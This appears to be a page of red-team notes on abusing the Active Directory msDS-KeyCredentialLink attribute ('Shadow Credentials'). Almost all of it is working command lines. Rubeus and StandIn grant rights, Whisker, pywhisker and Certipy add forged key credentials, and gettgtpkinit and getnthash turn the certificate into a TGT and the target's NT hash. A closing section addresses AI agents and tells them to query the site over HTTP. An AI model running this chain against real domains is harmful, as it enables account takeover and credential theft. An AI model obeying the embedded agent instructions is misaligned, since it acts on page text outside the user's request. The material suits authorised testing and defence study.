# Key Credentials Abuse

> "...if you can write to the `msDS-KeyCredentialLink` property of a user, you can retrieve the NT hash of that user." (Elad Shamir, [ref](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab))

That makes `GenericWrite` on a user effectively equal to DCSync right on that user.

{% hint style="info" %}
Remember that `WriteDacl` != `GenericWrite`, so in order to modify `msDS-KeyCredentialLink`, obtain necessary privileges first. For example, using [StandIn](https://github.com/FuzzySecurity/StandIn):

```
Cmd > Rubeus.exe createnetonly /program:cmd.exe /show /ticket:tgt.kirbi
Cmd > StandIn.exe --domain megacorp.local --object "samaccountname=snovvcrash" --grant "MEGACORP\jdoe" --type GenericAll
```

{% endhint %}

Check for existence of the `msDS-KeyCredentialLink` property in LDAP scheme with [powerview.py](https://github.com/aniqfakhrul/powerview.py):

```
PS > Get-DomainObject -SearchBase CN=Schema,CN=Configuration,DC=megacorp,DC=local -Properties lDAPDisplayName -Where "lDAPDisplayName contains msDS-KeyCredentialLink"
```

## Whisker

* <https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab>
* <https://github.com/eladshamir/Whisker>

List all the values of the the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe list /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local
```

Add a new value to the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe add /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /path:C:\Temp\cert.pfx /password:Passw0rd!
```

Remove a value from the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe remove /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local /deviceid:00ff00ff-00ff-00ff-00ff-00ff00ff00ff
```

Clear all the values of the the `msDS-KeyCredentialLink` attribute of a target object:

```
Cmd > .\Whisker.exe clear /target:WS01$ /domain:megacorp.local /dc:DC1.megacorp.local 
```

## pywhisker

* <https://github.com/ShutdownRepo/pywhisker>
* <https://podalirius.net/en/articles/parsing-the-msds-keycredentiallink-value-for-shadowcredentials-attack/>

```
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action add -f sqltest_cert
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action list
$ python3 pywhisker.py -d megacorp.local -u svc_mssql -p 'Passw0rd!' --target sqltest --action clear
$ python3 gettgtpkinit.py megacorp.local/sqltest -cert-pfx sqltest_cert.pfx -pfx-pass <PFX_PASS> sqltest.ccache
$ KRB5CCNAME=sqltest.ccache python3 getnthash.py megacorp.local/sqltest -key <AES_KEY>
```

## Certipy

```
$ certipy shadow auto -u svc_mssql@megacorp.local -k -no-pass -account sqltest -target DC01.megacorp.local -dc-ip 192.168.1.11 [-ns 192.168.1.11] [-dns-tcp]
```

## Tools

* <https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/Get-ADKeyCredential.md>
* <https://github.com/RedTeamPentesting/keycred>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/key-credentials-abuse.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.